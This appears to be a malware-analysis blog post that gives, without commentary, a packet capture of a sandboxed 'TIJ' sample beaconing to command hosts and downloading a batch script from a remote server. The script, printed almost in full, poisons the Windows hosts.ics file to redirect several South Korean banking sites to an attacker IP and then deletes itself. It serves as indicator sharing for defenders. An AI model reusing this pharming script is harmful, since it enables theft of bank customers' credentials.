HISTORICAL Malware Sample – TIJ – Traffic Sample Indicators Analysis

By | July 25, 2015

2013-02-03 21:49:49.176564 IP 8.8.8.8.53 > 172.16.253.130.53: 34738 1/0/0 A 174.139.45.210 (50)

E..N[Y….%……….5.5.:……………siqiao.gnway.net…………..<….-.

2013-02-03 21:49:49.179485 IP 172.16.253.130.1067 > 174.139.45.210.80: Flags [S], seq 2948849307, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0.C@…t…….-..+.P……..p…oc……….

2013-02-03 21:49:49.284041 IP 174.139.45.210.80 > 172.16.253.130.1067: Flags [R.], seq 2525759170, ack 2948849308, win 64240, length 0

E..([Z….Y…-……P.+……..P………….

2013-02-03 21:49:49.358483 IP 4.2.2.2.53 > 172.16.253.130.53: 34738 1/0/0 A 174.139.45.210 (50)

E..N[[…./……….5.5.:’…………..siqiao.gnway.net…………..<….-.

2013-02-03 21:49:49.717469 IP 172.16.253.130.1067 > 174.139.45.210.80: Flags [S], seq 2948849307, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0.E@…t…….-..+.P……..p…oc……….

2013-02-03 21:49:49.823584 IP 174.139.45.210.80 > 172.16.253.130.1067: Flags [R.], seq 4146087877, ack 1, win 64240, length 0

E..([\….Y…-……P.+..N…..P………….

2013-02-03 21:49:50.263366 IP 172.16.253.130.1067 > 174.139.45.210.80: Flags [S], seq 2948849307, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0.H@…t…….-..+.P……..p…oc……….

2013-02-03 21:49:50.370471 IP 174.139.45.210.80 > 172.16.253.130.1067: Flags [R.], seq 706310022, ack 1, win 64240, length 0

E..([]….Y…-……P.+..vH….P…e%……..

2013-02-03 21:49:51.356265 IP 172.16.253.130.1068 > 174.139.45.210.8888: Flags [S], seq 1431855748, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0.L@…t…….-..,”.UXb…..p…#}……….

2013-02-03 21:49:51.478162 IP 174.139.45.210.8888 > 172.16.253.130.1068: Flags [S.], seq 2850725909, ack 1431855749, win 64240, options [mss 1460], length 0

E..,[^….Y}..-…..”..,….UXb.`….r……..

2013-02-03 21:49:51.478204 IP 172.16.253.130.1068 > 174.139.45.210.8888: Flags [.], ack 1, win 64240, length 0

E..(.M@…t…….-..,”.UXb…..P….0..

2013-02-03 21:49:51.478519 IP 172.16.253.130.1068 > 174.139.45.210.8888: Flags [P.], seq 1:105, ack 1, win 64240, length 104

E….N@…t)……-..,”.UXb…..P….m..http://110.34.198.123:888/3.txt………………..|…|….

..|L..|?..|0………………………A1..

2013-02-03 21:49:51.871030 IP 172.16.253.130.1070 > 110.34.198.123.888: Flags [P.], seq 1:280, ack 1, win 64240, length 279

E..?.R@….6….n”.{…x<….8 |P….N..GET /3.txt HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Host: 110.34.198.123:888

Connection: Keep-Alive

 

 

2013-02-03 21:49:51.871230 IP 110.34.198.123.888 > 172.16.253.130.1070: Flags [.], ack 280, win 64240, length 0

E..([a…..>n”.{…..x…8 |<…P………….

2013-02-03 21:49:51.980369 IP 110.34.198.123.888 > 172.16.253.130.1070: Flags [P.], seq 1:1229, ack 280, win 64240, length 1228

E…[b…..pn”.{…..x…8 |<…P…….HTTP/1.1 200 OK

Content-Length: 8050

Content-Type: text/plain

Last-Modified: Sun, 08 Sep 2013 10:17:38 GMT

Accept-Ranges: bytes

ETag: “888d50a57cacce1:a22″

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 09 Sep 2013 01:27:28 GMT

 

@echo off

echo.

del %systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 open.hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      open.hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 open.kbstar.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      open.kbstar.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 open.shinhan.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      open.shinhan.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 open.ibk.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.25

2013-02-03 21:49:52.210020 IP 110.34.198.123.888 > 172.16.253.130.1070: Flags [P.], seq 7369:8302, ack 280, win 64240, length 933

E…[i……n”.{…..x…8=D<…P…….\etc\hosts.ics

echo 67.198.255.93 www.ebank.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      www.ebank.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 ebank.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      ebank.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 www.online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      www.online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 www.hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93      www.hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

echo 67.198.255.93 hanabank.com>>%systemroot%\system32\drivers\etc\hosts.ics

del %0

2013-02-03 21:49:52.210050 IP 172.16.253.130.1070 > 110.34.198.123.888: Flags [.], ack 8302, win 64240, length 0

E..(.[@….D….n”.{…x<….8@.P….@..

2013-02-03 21:50:00.208193 IP 172.16.253.130.53 > 8.8.8.8.53: 41343+ A? blog.sina.com.cn. (34)

E..>.j……………5.5.*.6………….blog.sina.com.cn…..

2013-02-03 21:50:00.208388 IP 172.16.253.130.53 > 4.2.2.2.53: 41343+ A? blog.sina.com.cn. (34)

E..>.k……………5.5.*.B………….blog.sina.com.cn…..

2013-02-03 21:50:00.323675 IP 8.8.8.8.53 > 172.16.253.130.53: 41343 2/0/0 CNAME blogx.sina.com.cn., A 218.30.115.254 (70)

E..b[j….%~………5.5.N.1………….blog.sina.com.cn…………..9…blogx………..9….s.

2013-02-03 21:50:00.361090 IP 172.16.253.130.1071 > 218.30.115.254.80: Flags [S], seq 1585046124, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0.m@………..s../.P^y.l….p…K………..

2013-02-03 21:50:00.646350 IP 218.30.115.254.80 > 172.16.253.130.1071: Flags [S.], seq 317158172, ack 1585046125, win 64240, options [mss 1460], length 0

E..,[k……..s……P./..s.^y.m`………….

2013-02-03 21:50:00.646392 IP 172.16.253.130.1071 > 218.30.115.254.80: Flags [.], ack 1, win 64240, length 0

E..(.n@………..s../.P^y.m..s.P…….

2013-02-03 21:50:00.646582 IP 172.16.253.130.1071 > 218.30.115.254.80: Flags [P.], seq 1:95, ack 1, win 64240, length 94

E….o@….S……s../.P^y.m..s.P…{…GET /s/blog_b2afd7fe01019tkf.html HTTP/1.1

User-Agent: getURLDown

Host: blog.sina.com.cn

2013-02-03 22:02:06.763902 IP 172.16.253.130.1114 > 192.157.200.62.6000: Flags [S], seq 4204045623, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0..@….p…….>.Z.p…7….p….(……….

2013-02-03 22:02:09.638461 IP 172.16.253.130.1114 > 192.157.200.62.6000: Flags [S], seq 4204045623, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0..@….o…….>.Z.p…7….p….(……….

2013-02-03 22:02:11.114264 IP 192.157.200.62.6000 > 172.16.253.130.1114: Flags [R.], seq 3384060252, ack 4204045624, win 64240, length 0

E..(]k………>…..p.Z…\…8P…S………

2013-02-03 22:02:11.607218 IP 172.16.253.130.1114 > 192.157.200.62.6000: Flags [S], seq 4204045623, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0..@….n…….>.Z.p…7….p….(……….

2013-02-03 22:02:17.135097 IP 192.157.200.62.6000 > 172.16.253.130.1114: Flags [R.], seq 4229987254, ack 1, win 64240, length 0

E..(]l………>…..p.Z..%….8P………….

2013-02-03 22:02:17.436525 IP 172.16.253.130.1115 > 192.157.200.62.6000: Flags [S], seq 3341330087, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0..@….m…….>.[.p.(……p….#……….

2013-02-03 22:02:17.539165 IP 192.157.200.62.6000 > 172.16.253.130.1115: Flags [R.], seq 1167834967, ack 3341330088, win 64240, length 0

E..(]m………>…..p.[E..W.(..P………….

2013-02-03 22:02:18.060956 IP 172.16.253.130.1115 > 192.157.200.62.6000: Flags [S], seq 3341330087, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0..@….l…….>.[.p.(……p….#……….

2013-02-03 22:02:23.368473 IP 192.157.200.62.6000 > 172.16.253.130.1115: Flags [R.], seq 693350802, ack 1, win 64240, length 0

E..(]n………>…..p.[n.p..(..P………….

2013-02-03 22:02:23.857379 IP 172.16.253.130.1115 > 192.157.200.62.6000: Flags [S], seq 3341330087, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0..@….k…….>.[.p.(……p….#……….

2013-02-03 22:02:25.988814 IP 192.157.200.62.6000 > 172.16.253.130.1115: Flags [R.], seq 570998218, ack 1, win 64240, length 0

E..(]o………>…..p.[g.}!.(..P………….

Share Button